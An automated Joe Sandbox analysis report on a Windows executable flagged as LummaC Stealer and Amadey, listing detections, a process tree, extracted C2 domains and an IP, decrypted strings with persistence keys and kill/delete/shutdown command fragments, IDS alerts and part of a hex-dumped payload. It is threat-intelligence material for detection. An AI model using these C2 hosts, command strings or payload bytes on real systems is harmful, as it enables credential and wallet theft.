Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Dl6wuWiQdg.exe

Overview

General Information

Sample name:Dl6wuWiQdg.exe
renamed because original name is a hash value
Original sample name:b71b7aedba64dfac7fb62b18fe22e956.exe
Analysis ID:1582703
MD5:b71b7aedba64dfac7fb62b18fe22e956
SHA1:94dbd7b49946dac493466b8702f7ca527833b9cc
SHA256:a28bd583dab27c6e95c9f14ae64bd0b6831cc9226737f68b1a8bf9dd033843fa
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC, Amadey, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Dl6wuWiQdg.exe (PID: 6248 cmdline: "C:\Users\user\Desktop\Dl6wuWiQdg.exe" MD5: B71B7AEDBA64DFAC7FB62B18FE22E956)
    • 8WYS1MQTL0QCOHKIPL8.exe (PID: 6460 cmdline: "C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
      • skotes.exe (PID: 5840 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 375CE25C0529862F6EE716A3E001BB0E)
  • skotes.exe (PID: 2884 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 375CE25C0529862F6EE716A3E001BB0E)
  • skotes.exe (PID: 4148 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 375CE25C0529862F6EE716A3E001BB0E)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": ["nearycrepso.shop", "tirepublicerj.shop", "abruptyopsn.shop", "fancywaxxers.shop", "framekgirus.shop", "wholersorie.shop", "cloudewahsj.shop", "noisycuttej.shop", "rabidcowse.shop"], "Build id": "W0uk--"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              Process Memory Space: Dl6wuWiQdg.exe PID: 6248JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
                Click to see the 3 entries
                SourceRuleDescriptionAuthorStrings
                9.2.skotes.exe.780000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  6.2.skotes.exe.780000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    5.2.8WYS1MQTL0QCOHKIPL8.exe.d50000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      7.2.skotes.exe.780000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        No Sigma rule has matched
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-31T09:48:28.302124+010020283713Unknown Traffic192.168.2.649712104.21.112.1443TCP
                        2024-12-31T09:48:29.641749+010020283713Unknown Traffic192.168.2.649713104.21.112.1443TCP
                        2024-12-31T09:48:30.870750+010020283713Unknown Traffic192.168.2.649715104.21.112.1443TCP
                        2024-12-31T09:48:32.626850+010020283713Unknown Traffic192.168.2.649716104.21.112.1443TCP
                        2024-12-31T09:48:33.719521+010020283713Unknown Traffic192.168.2.649717104.21.112.1443TCP
                        2024-12-31T09:48:34.975857+010020283713Unknown Traffic192.168.2.649718104.21.112.1443TCP
                        2024-12-31T09:48:36.512535+010020283713Unknown Traffic192.168.2.649725104.21.112.1443TCP
                        2024-12-31T09:48:38.587255+010020283713Unknown Traffic192.168.2.649742104.21.112.1443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-31T09:48:29.154933+010020546531A Network Trojan was detected192.168.2.649712104.21.112.1443TCP
                        2024-12-31T09:48:30.138929+010020546531A Network Trojan was detected192.168.2.649713104.21.112.1443TCP
                        2024-12-31T09:48:39.122566+010020546531A Network Trojan was detected192.168.2.649742104.21.112.1443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-31T09:48:29.154933+010020498361A Network Trojan was detected192.168.2.649712104.21.112.1443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-31T09:48:30.138929+010020498121A Network Trojan was detected192.168.2.649713104.21.112.1443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-31T09:48:28.302124+010020586571Domain Observed Used for C2 Detected192.168.2.649712104.21.112.1443TCP
                        2024-12-31T09:48:29.641749+010020586571Domain Observed Used for C2 Detected192.168.2.649713104.21.112.1443TCP
                        2024-12-31T09:48:30.870750+010020586571Domain Observed Used for C2 Detected192.168.2.649715104.21.112.1443TCP
                        2024-12-31T09:48:32.626850+010020586571Domain Observed Used for C2 Detected192.168.2.649716104.21.112.1443TCP
                        2024-12-31T09:48:33.719521+010020586571Domain Observed Used for C2 Detected192.168.2.649717104.21.112.1443TCP
                        2024-12-31T09:48:34.975857+010020586571Domain Observed Used for C2 Detected192.168.2.649718104.21.112.1443TCP
                        2024-12-31T09:48:36.512535+010020586571Domain Observed Used for C2 Detected192.168.2.649725104.21.112.1443TCP
                        2024-12-31T09:48:38.587255+010020586571Domain Observed Used for C2 Detected192.168.2.649742104.21.112.1443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-31T09:48:27.818762+010020586561Domain Observed Used for C2 Detected192.168.2.6493711.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-31T09:48:35.412465+010020480941Malware Command and Control Activity Detected192.168.2.649718104.21.112.1443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-31T09:49:10.169424+010028561471A Network Trojan was detected192.168.2.649946185.215.113.4380TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: Dl6wuWiQdg.exeAvira: detected
                        Source: https://fancywaxxers.shop/apihAvira URL Cloud: Label: malware
                        Source: https://fancywaxxers.shop/api$FAvira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.phpSAvira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.phpRAvira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.phpa/Avira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.phpncodedAvira URL Cloud: Label: malware
                        Source: https://fancywaxxers.shop/hn7:CAvira URL Cloud: Label: malware
                        Source: https://fancywaxxers.shop:443/apiAvira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.phpI/Avira URL Cloud: Label: malware
                        Source: https://fancywaxxers.shop:443/apiDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:Avira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.phpE/Avira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.php1/Avira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.phpdedAvira URL Cloud: Label: malware
                        Source: https://fancywaxxers.shop/inAvira URL Cloud: Label: malware
                        Source: https://fancywaxxers.shop/ahAvira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.phpnAvira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.php)/Avira URL Cloud: Label: malware
                        Source: http://185.215.113.43/Zu7JuNko/index.php%/Avira URL Cloud: Label: malware
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                        Source: Dl6wuWiQdg.exe.6248.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["nearycrepso.shop", "tirepublicerj.shop", "abruptyopsn.shop", "fancywaxxers.shop", "framekgirus.shop", "wholersorie.shop", "cloudewahsj.shop", "noisycuttej.shop", "rabidcowse.shop"], "Build id": "W0uk--"}
                        Source: Dl6wuWiQdg.exeVirustotal: Detection: 56%Perma Link
                        Source: Dl6wuWiQdg.exeReversingLabs: Detection: 60%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exeJoe Sandbox ML: detected
                        Source: Dl6wuWiQdg.exeJoe Sandbox ML: detected
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: 185.215.113.43
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: /Zu7JuNko/index.php
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: S-%lu-
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: abc3bc1985
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: skotes.exe
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: Startup
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: cmd /C RMDIR /s/q
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: rundll32
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: Programs
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: %USERPROFILE%
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: cred.dll|clip.dll|
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: cred.dll
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: clip.dll
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: http://
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: https://
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: /quiet
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: /Plugins/
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: &unit=
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: shell32.dll
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: kernel32.dll
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: GetNativeSystemInfo
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: ProgramData\
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: AVAST Software
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: Kaspersky Lab
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: Panda Security
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: Doctor Web
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: 360TotalSecurity
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: Bitdefender
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: Norton
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: Sophos
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: Comodo
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: WinDefender
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: 0123456789
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: ------
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: ?scr=1
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: ComputerName
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: -unicode-
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: VideoID
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: DefaultSettings.XResolution
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: DefaultSettings.YResolution
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: ProductName
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: CurrentBuild
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: rundll32.exe
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: "taskkill /f /im "
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: " && timeout 1 && del
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: && Exit"
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: " && ren
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: Powershell.exe
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: -executionpolicy remotesigned -File "
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: shutdown -s -t 0
                        Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmpString decryptor: random
                        Source: Dl6wuWiQdg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49713 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49715 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49716 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49717 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49718 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49725 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49742 version: TLS 1.2

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.6:49371 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49712 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49718 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49717 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49715 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49716 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49742 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49713 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49725 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49946 -> 185.215.113.43:80
                        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49713 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49718 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49712 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 104.21.112.1:443
                        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49742 -> 104.21.112.1:443
                        Source: Malware configuration extractorURLs: nearycrepso.shop
                        Source: Malware configuration extractorURLs: tirepublicerj.shop
                        Source: Malware configuration extractorURLs: abruptyopsn.shop
                        Source: Malware configuration extractorURLs: fancywaxxers.shop
                        Source: Malware configuration extractorURLs: framekgirus.shop
                        Source: Malware configuration extractorURLs: wholersorie.shop
                        Source: Malware configuration extractorURLs: cloudewahsj.shop
                        Source: Malware configuration extractorURLs: noisycuttej.shop
                        Source: Malware configuration extractorURLs: rabidcowse.shop
                        Source: Malware configuration extractorIPs: 185.215.113.43
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 31 Dec 2024 08:48:39 GMTContent-Type: application/octet-streamContent-Length: 3243520Last-Modified: Tue, 31 Dec 2024 08:37:28 GMTConnection: keep-aliveETag: "6773ad48-317e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 80 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 31 00 00 04 00 00 7e d3 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 6f 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 6e 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d4 05 00 00 00 90 06 00 00 06 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 65 7a 69 76 6f 71 75 00 c0 2a 00 00 b0 06 00 00 c0 2a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 63 61 65 77 6c 72 78 00 10 00 00 00 70 31 00 00 04 00 00 00 58 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 31 00 00 22 00 00 00 5c 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 